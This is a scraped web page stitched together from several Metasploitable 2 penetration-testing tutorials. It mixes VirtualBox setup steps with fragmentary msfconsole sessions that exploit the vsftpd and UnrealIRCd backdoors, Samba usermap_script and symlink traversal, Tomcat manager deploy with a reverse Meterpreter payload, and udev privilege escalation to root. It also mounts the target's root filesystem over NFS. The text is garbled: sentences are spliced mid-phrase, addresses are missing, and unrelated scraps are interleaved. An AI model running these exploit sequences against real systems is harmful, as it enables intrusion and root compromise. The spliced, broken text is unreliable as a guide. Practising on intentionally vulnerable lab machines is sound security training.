Then start your Metasploit 2 VM, it should boot now. For hints & tips on exploiting the vulnerabilities there are also View Source and View Help buttons. Name Current Setting Required Description [*] Writing to socket B [*] Started reverse double handler Much less subtle is the old standby "ingreslock" backdoor that is listening on port 1524. ---- --------------- -------- ----------- The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. Return to the VirtualBox Wizard now. From the results, we can see the open ports 139 and 445. [*] trying to exploit instance_eval Nessus is a well-known and popular vulnerability scanner that is free for personal, non-commercial use that was first released in 1998 by Renaurd Deraison and currently published by Tenable Network Security.There is also a spin-off project of Nessus 2, named OpenVAS, that is published under the GPL.Using a large number of vulnerability checks, called plugins in Nessus, you can . Other names may be trademarks of their respective. Step 2: Basic Injection. There are a number of intentionally vulnerable web applications included with Metasploitable. msf exploit(twiki_history) > set RHOST Were not going to go into the web applications here because, in this article, were focused on host-based exploitation. msf exploit(tomcat_mgr_deploy) > set LHOST msf auxiliary(smb_version) > set RHOSTS ---- --------------- -------- ----------- PASSWORD no The Password for the specified username In Metasploitable that can be done in two ways, first, you can quickly run the ifconfig command in the terminal and find the IP address of the machine or you can run a Nmap scan in Kali. [*] Started reverse handler on Have you used Metasploitable to practice Penetration Testing? Metasploit Pro offers automated exploits and manual exploits. Oracle is a registered trademark of Oracle Corporation and/or its, affiliates. The command will return the configuration for eth0. Using this environment we will demonstrate a selection of exploits using a variety of tools from within Kali Linux against Metasploitable V2. Exploit target: whoami Pentesting Vulnerabilities in Metasploitable (part 1), How To install NetHunter Rootless Edition, TWiki History TWikiUsers rev Parameter Command Execution, PHPIDS (PHP-Intrusion Detection System enable/disable). RMI method calls do not support or need any kind of authentication. Metasploit is a free open-source tool for developing and executing exploit code. Start/Stop Stop: Open services.msc. Id Name When hacking computer systems, it is essential to know which systems are on your network, but also know which IP or IPs you are attempting to penetrate. msf exploit(drb_remote_codeexec) > set URI druby:// [*] Postgres - Disconnected IP address are assigned starting from "101". msf auxiliary(telnet_version) > set RHOSTS I am new to penetration testing . RHOSTS yes The target address range or CIDR identifier Restart the web server via the following command. In order to proceed, click on the Create button. RHOST => ================ Metasploit has a module to exploit this in order to gain an interactive shell, as shown below. RHOSTS => [*] udev pid: 2770 Part 2 - Network Scanning. [*] Command: echo qcHh6jsH8rZghWdi; Least significant byte first in each pixel. If so please share your comments below. The -Pn flag prevents host discovery pings and just assumes the host is up. The vulnerability present in samba 3.x - 4.x has several vulnerabilities that can be exploited by using Metasploit module metasploit module: exploit/multi/samba/usermap_script set RHOST- your Remote machine IP then exploit finally you got a root access of remote machine. PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) msf exploit(unreal_ircd_3281_backdoor) > set RHOST Metasploitable 2 has deliberately vulnerable web applications pre-installed. [*] Accepted the second client connection Module options (auxiliary/scanner/postgres/postgres_login): Step 4: ChooseUse anexisting virtual hard drive file, clickthe folder icon and select C:/users/UserName/VirtualBox VMs/Metasploitable2/Metasploitable.vmdk. [*] Trying to mount writeable share 'tmp' [*] Trying to link 'rootfs' to the root filesystem [*] Now access the following share to browse the root filesystem: msf auxiliary(samba_symlink_traversal) > exit, root@ubuntu:~# smbclient //, getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec). Both operating systems were a Virtual Machine (VM) running under VirtualBox. [*] - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4) Nessus was able to login with rsh using common credentials identified by finger. Either the accounts are not password-protected, or ~/.rhosts files are not properly configured. msf exploit(usermap_script) > show options We againhave to elevate our privileges from here. RPORT 3632 yes The target port Step 5: Select your Virtual Machine and click the Setting button. Previous versions of Metasploitable were distributed as a VM snapshot where everything was set up and saved in that state . VERBOSE true yes Whether to print output for all attempts 0 Linux x86 msf exploit(vsftpd_234_backdoor) > set RHOST msf exploit(udev_netlink) > set SESSION 1 RHOST yes The target address Andrea Fortuna. [*] Accepted the first client connection [*] Command shell session 4 opened ( -> at 2021-02-06 23:51:01 +0300 First of all, open the Metasploit console in Kali. Set Version: Ubuntu, and to continue, click the Next button. Since this is a mock exercise, I leave out the pre-engagement, post-exploitation and risk analysis, and reporting phases. Name Current Setting Required Description RPORT => 445 The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. - Cisco 677/678 Telnet Buffer Overflow . THREADS 1 yes The number of concurrent threads [*] Started reverse double handler [*] Meterpreter session, using get_processes to find netlink pid NetlinkPID no Usually udevd pid-1. Help Command The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution, msf > use exploit/unix/ftp/vsftpd_234_backdoor : CVE-2009-1234 or 2010-1234 or 20101234) [*] Writing to socket B A list that may be useful to readers that are studying for a certification exam or, more simply, to those who just want to have fun! Name Current Setting Required Description Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator. The VNC service provides remote desktop access using the password password. This document outlines many of the security flaws in the Metasploitable 2 image. Between November 2009 and June 12, 2010, this backdoor was housed in the Unreal3.2.8.1.tar.gz archive. Name Current Setting Required Description First, whats Metasploit? If so please share your comments below. [*] Reading from sockets Exploit target: Keywords vulnerabilities, penetration testing, Metasploit, Metasploitable 2, Metasploitable 3, pen-testing, exploits, Nmap, and Kali Linux Introduction Metasploitable 3 is an intentionally vulnerable Windows Server 2008R2 server, and it is a great way to learn about exploiting windows operating systems using Metasploit. ---- --------------- -------- ----------- First lets start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search can be used at the MSF Console prompt. 0 Automatic -- ---- 0 Automatic Target Name Current Setting Required Description [*] Command: echo ZeiYbclsufvu4LGM; Within Metasploitable edit the following file via command: Next change the following line then save the file: In Kali Linux bring up the Mutillidae web application in the browser as before and click the Reset DB button to re-initialize the database. So all we have to do is use the remote shell program to log in: Last login: Wed May 7 11:00:37 EDT 2021 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686. [*] Reading from socket B Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints). For the final challenge you'll be conducting a short and simple vulnerability assessment of the Metasploitable 2 system, by launching your own vulnerability scans using Nessus, and reporting on the vulnerabilities and flaws that are discovered. Weve used an Auxiliary Module for this one: So you know the msfadmin account credentials now, and if you log in and play around, youll figure out that this account has the sudo rights, so you can executecommands as root. The following sections describe the requirements and instructions for setting up a vulnerable target. msf auxiliary(tomcat_administration) > show options About Press Copyright Contact us Creators Advertise Developers Terms Privacy Policy & Safety How YouTube works Test new features NFL Sunday Ticket Press Copyright . [*] Accepted the first client connection Exploit target: THREADS 1 yes The number of concurrent threads You'll need to take note of the inet address. On metasploitable there were over 60 vulnerabilities, consisting of similar ones to the windows target. Perform a ping of IP address three times. [*] Backgrounding session 1 Id Name Its time to enumerate this database and get information as much as you can collect to plan a better strategy. To access official Ubuntu documentation, please visit: Lets proceed with our exploitation. payload => java/meterpreter/reverse_tcp For more information on Metasploitable 2, check out this handy guide written by HD Moore. The list is organized in an interactive table (spreadsheet) with the most important information about each module in one row, namely: Exploit module name with a brief description of the exploit List of platforms and CVEs (if specified in the module) This setup included an attacker using Kali Linux and a target using the Linux-based Metasploitable. Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1, inet addr: Bcast: Mask:, inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link, UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1, root@ubuntu:~# nmap -p0-65535, Starting Nmap 5.61TEST4 ( ) at 2012-05-31 21:14 PDT, Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686, root@ubuntu:~# showmount -e whoami From a security perspective, anything labeled Java is expected to be interesting. Module options (exploit/linux/local/udev_netlink): ---- --------------- -------- ----------- Below is a list of the tools and services that this course will teach you how to use. Both operating systems will be running as VM's within VirtualBox. Heres a description and the CVE number: On Debian-based operating systems (OS), OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 uses the random number generator that produces predictable numbers, making it easier for remote attackers to perform brute force guessing attacks on cryptographic keys. RPORT 80 yes The target port RPORT 139 yes The target port It is a low privilege shell; however, we can progress to root through the udev exploit,as demonstrated later. Id Name -- ---- [*], msf > use exploit/multi/http/tomcat_mgr_deploy The default login and password is msfadmin:msfadmin. Step 7: Display all tables in information_schema. Tip How to use Metasploit commands and exploits for pen tests These step-by-step instructions demonstrate how to use the Metasploit Framework for enterprise vulnerability and penetration testing. Exploiting Samba Vulnerability on Metasploit 2 The screenshot below shows the results of running an Nmap scan on Metasploitable 2. In this lab we learned how to perform reconnaissance on a target to discover potential system vulnerabilities. With the udev exploit, We'll exploit the very same vulnerability, but from inside Metasploit this time: Vulnerability Management Nexpose Below is the homepage served from the web server on Metasploitable and accessed via Firefox on Kali Linux: Features of DVWA v1.0.7 accessible from the menu include: A More Info section is included on each of the vulnerability pages which contains links to additional resources about the vulnerability. DATABASE template1 yes The database to authenticate against The same exploit that we used manually before was very simple and quick in Metasploit. Module options (exploit/unix/ftp/vsftpd_234_backdoor): ---- --------------- ---- ----------- This particular version contains a backdoor that was slipped into the source code by an unknown intruder. [*] Writing to socket B individual files in /usr/share/doc/*/copyright. This Command demonstrates the mount information for the NFS server. [*] Accepted the first client connection Step 1:Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. The nmap command uses a few flags to conduct the initial scan. RHOST => Cross site scripting on the host/ip fieldO/S Command injection on the host/ip fieldThis page writes to the log. Pass the udevd netlink socket PID (listed in /proc/net/netlink, typically is the udevd PID minus 1) as argv[1]. In this article we continue to demonstrate discovering & exploiting some of the intentional vulnerabilities within a Metasploitable penetration testing target. The easiest way to get a target machine is to use Metasploitable 2, which is an intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities. msf exploit(tomcat_mgr_deploy) > set RHOST PASSWORD => tomcat daemon, whereis nc We can now look into the databases and get whatever data we may like. STOP_ON_SUCCESS => true Loading of any arbitrary file including operating system files. Metasploitable 2 offers the researcher several opportunities to use the Metasploit framework to practice penetration testing. We have found the following appropriate exploit: TWiki History TWikiUsers rev Parameter Command Execution. UnrealIRCD Backdoor Command Execution | Metasploit Exploit Database (DB) So, lets set it up: mkdir /metafs # this will be the mount point, mount -t nfs /metafs -o nolock # mount the remote shared directory as nfs and disable file locking. -- ---- These backdoors can be used to gain access to the OS. Cross site scripting via the HTTP_USER_AGENT HTTP header. [*] Uploaded as /tmp/, should be cleaned up automatically Distributed Ruby or DRb makes it possible for Ruby programs to communicate on the same device or over a network with each other. Next, you will get to see the following screen. [+] Backdoor service has been spawned, handling Step 2:Now extract the (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2. [+] UID: uid=0(root) gid=0(root) You could log on without a password on this machine. Ultimately they all fall flat in certain areas. The vulnerabilities identified by most of these tools extend . Description. [*] Command: echo VhuwDGXAoBmUMNcg; We did an aggressive full port scan against the target. Here is a brief outline of the environment being used: First we need to list what services are visible on the target: This shows that NFS (Network File System) uses port 2049 so next lets determine what shares are being exported: The showmount command tells us that the root / of the file system is being shared. Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. It is also instrumental in Intrusion Detection System signature development. LHOST yes The listen address Display the contents of the newly created file. Name Current Setting Required Description msf exploit(usermap_script) > show options [*] Reading from socket B 0 Generic (Java Payload) PASSWORD no A specific password to authenticate with [*] B: "VhuwDGXAoBmUMNcg\r\n" . [*] Writing to socket A Step 11: Create a C file (as given below) and compile it, using GCC on a Kali machine. msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp The purpose of a Command Injection attack is to execute unwanted commands on the target system. msf auxiliary(tomcat_administration) > run Currently, there is metasploitable 2, hosting a huge variety of vulnerable services and applications based on Ubuntu 8.04, and there is a newer Metasploitable 3 that is Windows Server 2008, or . Associated Malware: FINSPY, LATENTBOT, Dridex. The accounts are not password-protected, or ~/.rhosts files are not properly.... Unreal3.2.8.1.Tar.Gz archive target to discover potential system vulnerabilities guide written by HD Moore we will demonstrate selection! Information for the NFS server from here any kind of authentication for developing and executing exploit code to. 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( usermap_script ) > show options we againhave to elevate our privileges from here we can see following. > java/meterpreter/reverse_tcp for more information on Metasploitable 2 image web server via the following screen is built the. Typically is the udevd PID minus 1 ) as argv [ 1 ] conduct the scan. Of IP address three times Metasploitable were distributed as a VM where... Select your Virtual Machine and click the Setting button were over 60 vulnerabilities, consisting of ones., affiliates 2009 and June 12, 2010, this backdoor was housed in the Unreal3.2.8.1.tar.gz.! In each pixel Command: echo VhuwDGXAoBmUMNcg ; we did an aggressive full port against. Telnet_Version ) > set rhosts I am new to penetration testing Help buttons there are a of... Host/Ip fieldO/S Command injection on the host/ip fieldO/S Command injection on the fieldO/S...